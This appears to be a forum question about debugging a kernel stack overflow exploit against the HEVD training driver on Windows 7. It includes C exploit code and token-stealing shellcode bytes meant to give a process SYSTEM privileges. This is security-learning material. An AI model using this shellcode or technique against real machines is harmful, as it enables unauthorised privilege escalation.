Assigning memory address of shellcode to buffer (for buffer overflow input)
I am attempting to exploit HEVD kernel driver buffer overflow challenge: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
However when running the below code my windows 7 machine doesn't execute the desired shellcode (assign current process with SYSTEM token):
#include <windows.h>
#include <stdio.h>
int main(void) {
char *buf = malloc(2084);
RtlFillMemory(buf, 2080, 0x41);
HANDLE driver_hndle = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, NULL, 0x3, 0, NULL);
//unsigned char payload[] = "\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x5d\xc2\x08\x00";
unsigned char payload[] = {
0x60, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, 0x8B, 0x40, 0x50, 0x89, 0xC1,
0xBA, 0x04, 0x00, 0x00, 0x00, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x2D,
0xB8, 0x00, 0x00, 0x00, 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, 0x75, 0xED,
0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, 0x8B, 0xB9, 0xF8, 0x00, 0x00, 0x00,
0x83, 0xE2, 0xF8, 0x83, 0xE7, 0x07, 0x01, 0xFA, 0x89, 0x91, 0xF8, 0x00,
0x00, 0x00, 0x61, 0x31, 0xC0, 0x5D, 0xC2, 0x08, 0x00
};
size_t payload_sz = sizeof(payload);
LPVOID payload_ptr = VirtualAlloc(0, payload_sz, 0x3000, 0x40);
RtlMoveMemory(payload_ptr, payload, payload_sz);
DWORD* address_field = (DWORD*)(buf + 2080);
*address_field = (DWORD)(&payload_ptr);
DWORD size_return = 0;
DeviceIoControl(driver_hndle, 0x222003, buf, sizeof(buf), NULL, 0, &size_return, NULL);
free(buf);
return 0;
}
I believe the issue is: Pointing the last 4 bytes of buf to the memory address returned from VirtualAlloc. I've also tried:
memcpy(buf + 2080, &payload_ptr, sizeof(payload_ptr));
Being this shellcode is universally capable of being executed on any windows 7 machine, I do not believe the issue lies within the shellcode. I've tested the shellcode within a python poc with the expected results (nt authority/system cmd.exe opening). The shellcode steals the token of SYSTEM process 0x4 and assigns it to a new cmd.exe process and spawns it. Can anyone help me understand what I'm doing wrong here?
